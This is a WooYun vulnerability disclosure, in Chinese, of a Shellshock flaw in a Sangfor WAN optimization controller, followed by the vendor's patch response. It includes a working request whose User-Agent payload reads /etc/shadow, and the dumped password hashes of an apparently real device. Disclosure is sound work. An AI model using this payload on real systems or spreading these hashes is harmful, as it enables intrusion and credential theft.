当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090594

漏洞标题:深信服wan optimization controller广域网控制器存在bash漏洞

相关厂商:深信服

漏洞作者: if、so

提交时间:2015-01-08 09:23

修复时间:2015-04-13 16:58

公开时间:2015-04-13 16:58

漏洞类型:远程代码执行

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-08: 细节已通知厂商并且等待厂商处理中
2015-01-08: 厂商已经确认,细节仅向厂商公开
2015-01-11: 细节向第三方安全合作伙伴开放
2015-03-04: 细节向核心白帽子及相关领域专家公开
2015-03-14: 细节向普通白帽子公开
2015-03-24: 细节向实习白帽子公开
2015-04-13: 细节向公众公开

简要描述:

深信服wan optimization controller广域网控制器存在bash漏洞

详细说明:

1111.png


请求

get /cgi-bin/login.cgi
Pragma: no-cache
Cache-Control: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Host: xxx
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: () { :;}; echo `/bin/cat /etc/shadow`
Accept: */*


得到

HTTP/1.0 200 OK
Date: Wed, 07 Jan 2015 15:57:01 GMT
Server: WocBoa/2.04.24
X-Frame-Options: SAMEORIGIN
Connection: close
root: $6$6gAtMfXXrfpOW1cf$Ld9Eq883AfCHH75wRJA.SDDI1DRUgvFrwkFRT1307x.vV.7ovDQZLfhA8VSH8uPDZ2TUU5Gi9uCB1xr8G5X6Q0:15869:0:99999:7:::
bin: *:15628:0:99999:7:::
daemon: *:15628:0:99999:7:::
adm: *:15628:0:99999:7:::
lp: *:15628:0:99999:7:::
sync: *:15628:0:99999:7:::
shutdown: *:15628:0:99999:7:::
halt: *:15628:0:99999:7:::
mail: *:15628:0:99999:7:::
uucp: *:15628:0:99999:7:::
operator: *:15628:0:99999:7:::
games: *:15628:0:99999:7:::
gopher: *:15628:0:99999:7:::
ftp: *:15628:0:99999:7:::
nobody: *:15628:0:99999:7:::
vcsa: !!:15869::::::
saslauth: !!:15869::::::
postfix: !!:15869::::::
sshd: !!:15869::::::
tcpdump: !!:15869::::::
apache: !!:15901::::::
mysql: !!:15901::::::
ntp: !!:15904::::::
admin: $6$HSvOTuhT$jZWHmqykDzvfmsCyrU7G72BDKMd3ckh93jvwt651uXt/IEkj5kE1V1JOdt03ddqoBM0OIC9eMUUWnNIeJM7.H0:16429:0:99999:7:::
root: $6$6gAtMfXXrfpOW1cf$Ld9Eq883AfCHH75wRJA.SDDI1DRUgvFrwkFRT1307x.vV.7ovDQZLfhA8VSH8uPDZ2TUU5Gi9uCB1xr8G5X6Q0:15869:0:99999:7:::
bin: *:15628:0:99999:7:::
daemon: *:15628:0:99999:7:::
adm: *:15628:0:99999:7:::
lp: *:15628:0:99999:7:::
sync: *:15628:0:99999:7:::
shutdown: *:15628:0:99999:7:::
halt: *:15628:0:99999:7:::
mail: *:15628:0:99999:7:::
uucp: *:15628:0:99999:7:::
operator: *:15628:0:99999:7:::
games: *:15628:0:99999:7:::
gopher: *:15628:0:99999:7:::
ftp: *:15628:0:99999:7:::
nobody: *:15628:0:99999:7:::
vcsa: !!:15869::::::
saslauth: !!:15869::::::
postfix: !!:15869::::::
sshd: !!:15869::::::
tcpdump: !!:15869::::::
apache: !!:15901::::::
mysql: !!:15901::::::
ntp: !!:15904::::::
admin: $6$HSvOTuhT$jZWHmqykDzvfmsCyrU7G72BDKMd3ckh93jvwt651uXt/IEkj5kE1V1JOdt03ddqoBM0OIC9eMUUWnNIeJM7.H0:16429:0:99999:7:::


貌似admin就是登陆账号

漏洞证明:

get /cgi-bin/login.cgi
Pragma: no-cache
Cache-Control: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Host: xxx
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: () { :;}; echo `/bin/cat /etc/shadow`
Accept: */*


得到

HTTP/1.0 200 OK
Date: Wed, 07 Jan 2015 15:57:01 GMT
Server: WocBoa/2.04.24
X-Frame-Options: SAMEORIGIN
Connection: close
root: $6$6gAtMfXXrfpOW1cf$Ld9Eq883AfCHH75wRJA.SDDI1DRUgvFrwkFRT1307x.vV.7ovDQZLfhA8VSH8uPDZ2TUU5Gi9uCB1xr8G5X6Q0:15869:0:99999:7:::
bin: *:15628:0:99999:7:::
daemon: *:15628:0:99999:7:::
adm: *:15628:0:99999:7:::
lp: *:15628:0:99999:7:::
sync: *:15628:0:99999:7:::
shutdown: *:15628:0:99999:7:::
halt: *:15628:0:99999:7:::
mail: *:15628:0:99999:7:::
uucp: *:15628:0:99999:7:::
operator: *:15628:0:99999:7:::
games: *:15628:0:99999:7:::
gopher: *:15628:0:99999:7:::
ftp: *:15628:0:99999:7:::
nobody: *:15628:0:99999:7:::
vcsa: !!:15869::::::
saslauth: !!:15869::::::
postfix: !!:15869::::::
sshd: !!:15869::::::
tcpdump: !!:15869::::::
apache: !!:15901::::::
mysql: !!:15901::::::
ntp: !!:15904::::::
admin: $6$HSvOTuhT$jZWHmqykDzvfmsCyrU7G72BDKMd3ckh93jvwt651uXt/IEkj5kE1V1JOdt03ddqoBM0OIC9eMUUWnNIeJM7.H0:16429:0:99999:7:::
root: $6$6gAtMfXXrfpOW1cf$Ld9Eq883AfCHH75wRJA.SDDI1DRUgvFrwkFRT1307x.vV.7ovDQZLfhA8VSH8uPDZ2TUU5Gi9uCB1xr8G5X6Q0:15869:0:99999:7:::
bin: *:15628:0:99999:7:::
daemon: *:15628:0:99999:7:::
adm: *:15628:0:99999:7:::
lp: *:15628:0:99999:7:::
sync: *:15628:0:99999:7:::
shutdown: *:15628:0:99999:7:::
halt: *:15628:0:99999:7:::
mail: *:15628:0:99999:7:::
uucp: *:15628:0:99999:7:::
operator: *:15628:0:99999:7:::
games: *:15628:0:99999:7:::
gopher: *:15628:0:99999:7:::
ftp: *:15628:0:99999:7:::
nobody: *:15628:0:99999:7:::
vcsa: !!:15869::::::
saslauth: !!:15869::::::
postfix: !!:15869::::::
sshd: !!:15869::::::
tcpdump: !!:15869::::::
apache: !!:15901::::::
mysql: !!:15901::::::
ntp: !!:15904::::::
admin: $6$HSvOTuhT$jZWHmqykDzvfmsCyrU7G72BDKMd3ckh93jvwt651uXt/IEkj5kE1V1JOdt03ddqoBM0OIC9eMUUWnNIeJM7.H0:16429:0:99999:7:::

修复方案:

。。

版权声明:转载请注明来源 if、so@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-01-08 14:49

厂商回复:

该漏洞深信服已于2014年9月下旬修复该漏洞,并在官方网站上发布了补丁包。该漏洞是由于客户的设备放置在内网中,无法自动更新漏洞补丁包导致的。我们的技术工程师已经和客户联系帮其手动安装补丁包修复该漏洞。故将危害等级降为Rank5。

最新状态:

2015-01-14:深信服已于2014年9月下旬修复该漏洞,并在官方网站上发布了补丁包,大多数用户已经通过联网在线升级完成该漏洞的修复。本次漏洞涉及的用户,是由于客户的设备无法联网,导致未能及时升级bash补丁,同时未进行手动安全补丁包。我们的客服人员已联系用户并帮助其完成补丁包升级修复了该漏洞。


漏洞评价:

评论

  1. 2015-01-08 11:33 | 理工小强 ( 路人 | Rank:2 漏洞数:1 | 学一行恨一行,目前从事无线行业。)

    果然深信服还是基于*unix开发的 ~